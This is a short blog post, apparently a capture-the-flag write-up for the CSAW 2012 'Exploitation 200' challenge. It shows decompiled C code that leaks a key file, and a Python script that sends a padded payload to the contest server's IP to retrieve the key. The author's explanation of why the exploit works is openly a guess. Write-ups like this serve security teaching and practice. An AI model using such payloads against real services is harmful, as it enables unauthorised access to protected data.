Sunday, September 30, 2012

CSAW CTF Quals: Exploitation 200

This binary was not so much an exploitation as understanding how the code that they were using worked. So we downloaded the binary and got to work. The important code is shown below.
  memset(&buf, 0, 0x200u);
  send(fd, "Wecome to my first CS project.\nPlease type your name:  ", 0x37u, 0);
  recv(fd, &buf, 0x204u, 0);
  v3 = 0;
  if ( !strcmp(&buf, "AAAAAAAAAAAAAAAAAAAAAAAAAA\n") )
    v4 = 1;
  if ( v4 )
  {
    ::fd = (int)fopen("./key", "r");
    __isoc99_fscanf(::fd, "%s", &buf);
    recv(fd, 0, 0x10u, 64);
    send(fd, &buf, 0x200u, 0);
  }
 
We got this working on our local machine and got the key by simply sending the string AAAAAAAAAAAAAAAAAAAAAAAAAA\n to the server and it would spit back our key that we created to us at the beginning of the string we wrote, like bobAAAAAAAAAAAAAAAAAAAAAAA. However, this did not work on their server to the bewilderment of our group.

We new that they gave us a large number of bytes to play with in the buffer and with the recv, so we eventually just sent AAAAAAAAAAAAAAAAAAAAAAAAAA\n+'A'*100+'\x00' to the game server and it spit back the key to us in embedded in the payload. We believe that it did not work in the first case because the buffer was set to all null bytes and there was not enough 'space' available to write to because the payload we sent to was too small to fit the key into. So our winning payload, win.py, is shown below.
import socket

s = socket.socket()
s.connect(('128.238.66.218',54321))

s.recv(1024)
winner = 'AAAAAAAAAAAAAAAAAAAAAAAAAA\n'
winner += 'A'*(0x200-len(winner))+'\x00'
print winner
s.sendall(winner+'\n')
#s.sendall('a'*15+'\n')
print s.recv(1024)


  -- suntzu_II

No comments:

Post a Comment